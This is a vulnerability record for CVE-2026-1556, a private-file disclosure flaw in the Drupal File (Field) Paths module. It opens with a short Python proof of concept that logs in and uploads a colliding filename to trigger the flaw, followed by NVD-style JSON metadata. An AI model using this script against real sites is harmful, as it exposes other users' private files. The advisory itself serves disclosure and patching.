CVE-2026-1556

import requests # This is a conceptual Proof of Concept (PoC) for CVE-2026-1556 # It demonstrates how an authenticated user might attempt to trigger the file disclosure. # Requires valid session cookies and knowledge of the target file structure. target_url = "http://example-drupal-site/node/add/page" login_url = "http://example-drupal-site/user" # Attacker credentials username = "attacker" password = "password" # File to simulate collision (assuming victim has 'secret.pdf') files = { 'files[field_file_und_0]': ('secret.pdf', 'This is the attacker uploaded content', 'application/pdf') } data = { 'title': 'PoC Attack', 'form_id': 'page_node_form', 'form_build_id': 'form-xxx' # Needs to be fetched dynamically } session = requests.Session() # 1. Login to get authenticated session login_data = { 'name': username, 'pass': password, 'form_id': 'user_login', 'op': 'Log in' } session.post(login_url, data=login_data) # 2. Upload the file to trigger the collision vulnerability response = session.post(target_url, files=files, data=data) if response.status_code == 200: print("[+] Upload request sent. Check email attachments or logs for leaked URI.") else: print("[-] Request failed.")

{"cve": {"id": "CVE-2026-1556", "sourceIdentifier": "[email protected]", "published": "2026-03-26T22:16:27.843", "lastModified": "2026-04-02T20:33:54.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Information disclosure in the file URI processing of File (Field) Paths in Drupal File (Field) Paths 7.x prior to 7.1.3 on Drupal 7.x allows authenticated users to disclose other users’ private files via filename‑collision uploads. This can cause hook_node_insert() consumers (for example, email attachment modules) to receive the wrong file URI, bypassing normal access controls on private files."}, {"lang": "es", "value": "Revelación de información en el procesamiento de URI de archivo de Rutas de Archivo (Campo) en Drupal File (Field) Paths 7.x anterior a 7.1.3 en Drupal 7.x permite a usuarios autenticados revelar archivos privados de otros usuarios mediante cargas por colisión de nombres de archivo. Esto puede causar que consumidores de hook_node_insert() (por ejemplo, módulos de adjuntos de correo electrónico) reciban la URI de archivo incorrecta, eludiendo los controles de acceso normales en archivos privados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deciphered:filefield_paths:*:*:*:*:*:drupal:*:*", "versionEndExcluding": "7.x-1.3", "matchCriteriaId": "FD9688B8-4C6B-4E8F-8C39-8D46941E9A01"}]}]}], "references": [{"url": "https://d7es.tag1.com/security-advisories/file-field-paths-moderately-critical-file-path-manipulation", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.herodevs.com/vulnerability-directory/cve-2026-1556", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}]}}